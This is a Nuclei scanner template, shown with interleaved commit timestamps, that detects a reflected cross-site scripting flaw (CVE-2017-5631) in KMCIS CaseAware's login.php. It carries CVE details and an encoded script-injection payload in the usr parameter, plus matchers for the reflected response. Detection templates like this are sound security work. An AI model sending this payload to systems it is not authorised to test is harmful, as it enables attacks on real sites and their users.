nuclei-templates/http/cves/2017/CVE-2017-5631.yaml

48 lines
1.4 KiB
YAML
Raw Normal View History

2022-04-13 10:41:03 +00:00
id: CVE-2017-5631
info:
name: KMCIS CaseAware - Cross-Site Scripting
2022-04-13 10:41:03 +00:00
author: edoardottt
severity: medium
description: KMCIS CaseAware contains a reflected cross-site scripting vulnerability via the user parameter transmitted in the login.php query string.
2023-09-06 13:22:34 +00:00
remediation: |
To remediate this vulnerability, it is recommended to apply the latest patches or updates provided by the vendor.
2022-04-15 12:16:56 +00:00
reference:
- https://www.openbugbounty.org/incidents/228262/
- https://www.exploit-db.com/exploits/42042/
- https://nvd.nist.gov/vuln/detail/CVE-2017-5631
2022-04-13 10:41:03 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-5631
cwe-id: CWE-79
2023-07-11 19:49:27 +00:00
epss-score: 0.00286
2023-08-31 11:46:18 +00:00
epss-percentile: 0.64713
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:kmc_information_systems:caseaware:-:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: kmc_information_systems
product: caseaware
tags: edb,cve,cve2017,xss,caseaware
2022-04-13 10:41:03 +00:00
http:
2022-04-13 10:41:03 +00:00
- method: GET
path:
2022-04-15 12:16:56 +00:00
- "{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
2022-04-13 10:41:03 +00:00
matchers-condition: and
matchers:
- type: word
2022-04-15 12:16:56 +00:00
part: body
2022-04-13 10:41:03 +00:00
words:
2022-04-15 12:16:56 +00:00
- "'></script><script>alert(document.domain)</script>"
2022-04-13 10:41:03 +00:00
- type: word
2022-04-15 12:16:56 +00:00
part: header
2022-04-13 10:41:03 +00:00
words:
2022-04-15 12:16:56 +00:00
- text/html
- type: status
status:
- 200